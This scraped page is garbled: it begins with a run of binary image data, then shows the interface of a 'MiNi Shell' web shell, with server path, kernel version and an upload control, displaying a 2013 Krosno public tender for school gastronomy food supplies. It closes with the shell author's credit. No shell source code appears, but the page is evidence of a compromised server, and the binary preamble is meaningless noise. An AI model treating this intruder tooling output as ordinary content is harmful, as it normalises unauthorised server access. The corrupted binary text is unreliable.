JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/50506-N-2013.html

<p class="kh_header"><b>Krosno: Dostawa produktów spożywczych niezbędnych do przeprowadzenia zajęć dydaktyczno - wyrównawczych z zakresu gastronomii dla uczestników projektu pn.:Podkarpacie stawia na zawodowców</b><br>
<b>Numer ogłoszenia: 50506 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krosno , ul. Lwowska 28a, 38-400 Krosno, woj. podkarpackie, tel. 13 47 43 312, faks 13 47 43 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych niezbędnych do przeprowadzenia zajęć dydaktyczno - wyrównawczych z zakresu gastronomii dla uczestników projektu pn.:Podkarpacie stawia na zawodowców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z IV części:
I- Dostawa produktów zwierzęcych, mięsa i produktów mięsnych
II - Dostawa owoców, warzyw i podobnych produktów
III - Dostawa produktów mleczarskich
IV - Dostawa różnych produktów spożywczych

CZĘŚĆ I.
Dostawa produktów zwierzęcych, mięsa i produktów mięsnych.
Lp.	Nazwa produktu	Jednostka	Ilość
1	Antrykot	kg	6
2	Boczek wędzony	kg	3
3	Cielęcina	kg	3
4	Filet  drobiowy	kg	24
5	Filet z indyka  	kg	3
6	Kaczka mrożona	szt.	3
7	Karkówka	kg	3
8	Królik mrożony	szt	3
9	Kurczak	szt	6
10	Łopatka wieprzowa	kg	6
11	Polędwica wieprzowa	kg	3
12	Polędwica wołowa	kg	6
13	Ryba tilapia mrożona	kg	6
14	Schab bez kości	kg	9
15	Szynka konserwowa	kg	3
16	Szynka surowa	kg	6
17	Udko z kurczaka 	szt	24
18	Wątroba drobiowa	kg	3
19	Żeberka	kg	1,5

CZĘŚĆ II.
Dostawa owoców, warzyw i podobnych produktów.
Lp.	Nazwa produktu	Jednostka	Ilość
1	Banany	kg	3
2	Brokuły	szt	6
3	Buraki	kg	12
4	Cebula	kg	6
5	Cebula czerwona	kg	1.5
6	Cytryna	kg	1,5
7	Czosnek świeży	główka	9
8	Fasola czerwona	kg	1,5
9	Fasola Jaś	kg	1,5
10	Fasolka szparagowa mrożona	kg	1,5
11	Groch cały	kg	1,5
12	Groch łuskany połówki	kg	1,5
13	Groszek zielony mrożony	kg	3
14	Grzyby kurki mrożone	kg	3
15	Jabłka	kg	9
16	Kalafior	szt 	6
17	Kapusta biała	główka	6
18	Kapusta czerwona	główka	3
19	Kapusta pekińska	szt	6
20	Kapusta włoska	szt	3
21	Kiwi	szt	9
22	Kokos	gram	600
23	Koperek	pęczek 	30
24	Mak	gram	1500
25	Mandarynki	kg	1,5
26	Marchew	kg	9
27	Marchewki małe mrożone	kg	1,5
28	Morele suszone	gram	1200
29	Natka pietruszki	pęczek	30
30	Ogórek szklarniowy	szt	                 12
31	Ogórki konserwowe	słoik	12
32	Ogórki kwaszone	słoik	6
33	Papryka czerwona	kg	12
34	Papryka konserwowa	słoik	9
35	Pieczarki	kg	9
36	Pieczarki marynowane	słoik	6
37	Pietruszka	kg	6
38	Pomarańcze	kg	6
39	Pomidor	kg	3
40	Pomidory całe w puszce	szt	6
41	Pomidory w kawałkach w puszce	szt	6
42	Por	szt	21
43	Rzodkiewka 	pęczek 	6
44	Sałata	szt	9
45	Seler	kg	6
46	Seler naciowy	szt	3
47	Szczypiorek	pęczek	30
48	Szpinak mrożony	op.	3
49	Truskawki mrożone 	kg	6
50	Winogrono	kg	3
51	Ziemniaki	kg	18

CZĘŚĆ III.
Dostawa produktów mleczarskich. 
Lp.	Nazwa produktu	Jednostka	Ilość
1	Jogurt naturalny	l	1,5
2	Margaryna Kasia	kostka	24
3	Margaryna zwykła	kostka	12
4	Masło 82% tłuszczu	kostka	45
5	Mleko skondensowane słodzone w puszce	szt	6
6	Mleko UHT 2%	l	21
7	Ser biały	kg	6
8	Ser żółty	kg	3
9	Smalec	kostka	6
10	Śmietana 18 % 	ml	3000
11	Śmietanka 30 % 	l	3


CZĘŚĆ IV.
Dostawa różnych produktów spożywczych.
Lp.	Nazwa produktu	Jednostka	Ilość
1	Ananas w puszce	szt	9
2	Brzoskwinie w puszce	szt	9
3	Budyń śmietankowy 	szt	12
4	Bulionetki drobiowe 	szt	12
5	Bulionetki pieczeniowe 	szt	12
6	Bulionetki wołowe 	szt	12
7	Bułka tarta	torebka	3
9	Chrzan tarty	ml	600
8	Cukier kryształ	kg	12
10	Cukier puder	kg	3
11	Cukier waniliowy 	torebka	12
12	Czosnek marynowany	słoik	3
13	Drożdże	gram	600
14	Dżem żurawinowy	słoik	3
15	Fasolka biała konserwowa	puszka	3
16	Fasolka czerwona konserwowa	puszka	3
17	Galaretka agrestowa 	szt	6
18	Galaretka brzoskwiniowa 	szt 	6
19	Galaretka cytrynowa 	szt	6
20	Galaretka pomarańczowa 	szt	6
21	Galaretka truskawkowa 	szt	6
22	Galaretka wiśniowa 	szt	6
23	Groszek konserwowy	puszka	9
24	Grzyby suszone	gram	1500
25	Herbata owocowa ekspresowa w torebkach	torebka	300
26	Jaja kurze świeże o gramaturze 50g	szt	360
27	Kakao	gram	750
28	Kasza gryczana	gram	1500
29	Kasza jęczmienna średnia	gram	1500
30	Kasza kuskus	gram	1500
31	Kawa rozpuszczalna	gram	600
32	Ketchup łagodny 	szt	3
33	Ketchup pikantny 	szt	3
34	Koncentrat buraczany 	szt	3
35	Kostka bulionowa cielęca 	kostka	12
36	Kostka bulionowa drobiowo - wołowa 	kostka	12
37	Kostka bulionowo  grzybowa 	kostka	12
38	Kukurydza konserwowa w puszce	szt	9
39	Kwasek cytrynowy	szt	3
40	Maga	ml	750
41	Majonez 	l	1,5
42	Makaron nitki	gram	1500
43	Makaron spaghetti	gram	1500
44	Makaron świderki	gram	1500
45	Marmolada wieloowocowa	szt	3
46	Marmolada z różą	szt	3
47	Masa makowa w puszce	szt	3
48	Mąka krupczatka	kg	6
49	Mąka pszenna	kg	21
50	Mąka tortowa	kg	9
51	Mąka ziemniaczana	kg	3
52	Musztarda	słoik	3
53	Ocet winny jabłkowy	ml	1500
54	Olej	l	9
55	Oliwa z oliwek z pierwszego tłoczenia	l	3
56	Oliwki czarne w zalewie	słoik	6
57	Oliwki zielone w zalewie	słoik	6
58	Pieprz mielony	torebka	9
59	Pieprz ziarnisty	torebka	9
60	Pieprz ziołowy ziarnisty	torebka	9
61	Płatki migdałowe	gram	600
62	Powidło śliwkowe	słoik	6
63	Proszek do pieczenia 	torebeczka	15
64	Przecier pomidorowy	l	3
65	Przyprawa  suszone pomidory, czosnek, bazylia	słoiczek	3
66	Przyprawa cynamon	torebka	3
67	Przyprawa czosnek granulowany	torebka	3
68	Przyprawa do mięsa mielonego	torebka	3
69	Przyprawa do mięsa wieprzowego	torebka	3
70	Przyprawa do pizzy	torebka	3
71	Przyprawa gałka muszkatołowa	torebka	3
72	Przyprawa goździki	torebka	3
73	Przyprawa imbir mielony	torebka	3
74	Przyprawa kminek cały	torebka	3
75	Przyprawa kolendra	torebka	3
76	Przyprawa liść laurowy	torebka	3
77	Przyprawa majeranek	torebka	3
78	Przyprawa oregano	torebka	3
79	Przyprawa papryka ostra	torebka	3
80	Przyprawa papryka słodka	torebka	3
81	Przyprawa tymianek	torebka	3
82	Przyprawa ziele angielskie	torebka	3
83	Rodzynki	gram	900
84	Ryż naturalny 	kg	3
85	Sos sałatkowy czosnkowy	torebka	6
86	Sól	kg	3
87	Żelatyna	torebka	6

Zamawiający zastrzega sobie możliwość zmniejszenia ilości towarów w ramach istniejącej umowy oraz możliwość niepełnej realizacji wartości umowy.

Dostawa towaru odbywać się będzie na koszt Wykonawcy sukcesywnie, każdorazowo do Specjalnego Ośrodka Szkolno - Wychowawczego w Krośnie, 38-400 Krosno, ul. Bema 46, w terminie do 24 godzin od zamówienia telefonicznego. 

Wykonawca zobowiązany jest do dostarczenia Zamawiającemu artykułów spożywczych dobrej jakości tj: świeżych, I gatunku, czystych, bez objawów chorób pleśni, bez obcych zapachów, nie robaczywych - dotyczy warzyw i owoców, o właściwej gramaturze oraz z właściwym terminem przydatności do spożycia. Jakość sprzedawanego towaru będzie zgodna z wymaganiami Polskich Norm. Towary będą oznaczone zgodnie z obowiązującymi przepisami.

Do każdej dostawy Wykonawca powinien dołączyć dokument zwierający: nazwę towaru, datę ważności (produkt musi być oznakowany), datę minimalnej trwałości, datę produkcji oraz termin przydatności do spożycia - nie dotyczy świeżych warzyw i owoców, wymagane atesty, orzeczenia, handlowy dokument identyfikacyjny w przypadku mięsa i wędlin, ilość i cenę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.30.00.00-1, 15.50.00.00-1, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: oferta musi być podpisana przez osobę/osoby wykonawcy uprawnioną/ne do zaciągania zobowiązań w Jego imieniu bądź przez ustanowionego przez nią/nie pełnomocnika/ów.
Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika. 
Pełnomocnictwo może dotyczyć zarówno reprezentowania wszystkich wykonawców składających wspólną ofertę w postępowaniu o udzielenie zamówienia publicznego, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Jeżeli pełnomocnictwo upoważnia jedynie do reprezentowania wykonawców w postępowaniu, to przed podpisaniem umowy z Zamawiającym wymagane będzie złożenie umowy, w której określone będą prawa i obowiązki poszczególnych wykonawców.
Pełnomocnictwo musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wskazywać wszystkich wykonawców wspólnie ubiegających się o zamówienie. 
Pełnomocnictwo musi być podpisane przez osoby wykonawców składających wspólną ofertę uprawnione do zaciągania zobowiązań w jego imieniu. 
Pełnomocnictwo, o którym mowa w niniejszym punkcie musi zostać złożone wraz z ofertą w formie oryginału lub kopii poświadczonej notarialnie.
Korespondencja z Zamawiającym oraz rozliczenia z wykonawcami dokonywane będą przez pełnomocnika wskazanego pełnomocnictwem. 
Podmiot składający ofertę jako uczestnik konsorcjum i jednocześnie składający ofertę samodzielnie lub jako uczestnik innego konsorcjum zostanie potraktowany jako składający dwie oferty i na tej podstawie wszystkie oferty z Jego udziałem zostaną odrzucone. Zasady podpisywania oferty dotyczą wszystkich jej dokumentów (informacji, wykazów, oświadczeń) oraz potwierdzania za zgodność z oryginałem składanych kopii.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach: 
a)	w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu i/lub podpisaniu umowy,
b)	w przypadku zawieszenia dostaw przez Zamawiającego.
2. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a)	zmiana stawki urzędowej podatku VAT,
b)	rezygnacji z części zamówienia, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych usług.
3. Warunki zmian:
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych usług,
c)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego - pokój nr 326, przy ul. Lwowskiej 28a w Krośnie - III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 10:00, miejsce: Krosno, ul. Lwowska 28a, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Podkarpacie stawia na zawodowców  - projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego
w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2.
*Informacja dodatkowa: postępowanie prowadzone jest w trybie przetargowym, gdyż jest ono częścią Projektu Podkarpacie stawia na zawodowców. Zamawiający w ramach dostaw dokona wydatkowania środków pieniężnych w wysokości znacznie przekraczającej 14.000 euro, jednak z przyczyn organizacyjnych dostawy w ramach projektu będą podzielone na kilka odrębnych postępowań. Jednym z nich jest niniejsze postępowanie, którego wartość szacunkowa nie przekracza 14.000 EURO. 

Sposób porozumiewania się Zamawiającego z wykonawcami: 
1. Oświadczenia, wnioski, zawiadomienia oraz informacje dotyczące postępowania Zamawiający i wykonawcy przekazują pisemnie, drogą mailową lub faksem. Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub pocztą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
2. Powyższe zasady porozumiewania się (tj. faks i e-mail) nie będą miały zastosowania do dokumentów, oświadczeń lub pełnomocnictw składanych w odpowiedzi na wezwanie dokonane przez Zamawiającego w trybie art. 26 ust. 3 Ustawy, ze względu na konieczność zachowania formy tychże oświadczeń lub dokumentów przewidzianej w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) lub przepisów Kodeksu cywilnego w przypadku pełnomocnictwa.
3. Osobami upoważnionymi do kontaktowania się z wykonawcami w powyższy sposób są:
1)	Jolanta Kopciuch-Szmyd  - Wydział Edukacji Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach merytorycznych,
2)	Adriana Łącka - Stanowisko ds. Zamówień Publicznych Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach formalno - prawnych;

Sposób porozumiewania się:
a) pisemnie - Krosno, ul. Lwowska 28a, z dopiskiem -Zamówienia publiczne
b) faksem - nr: 0-13 47 43 312
c) drogą mailową - zp@um.krosno.pl

Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com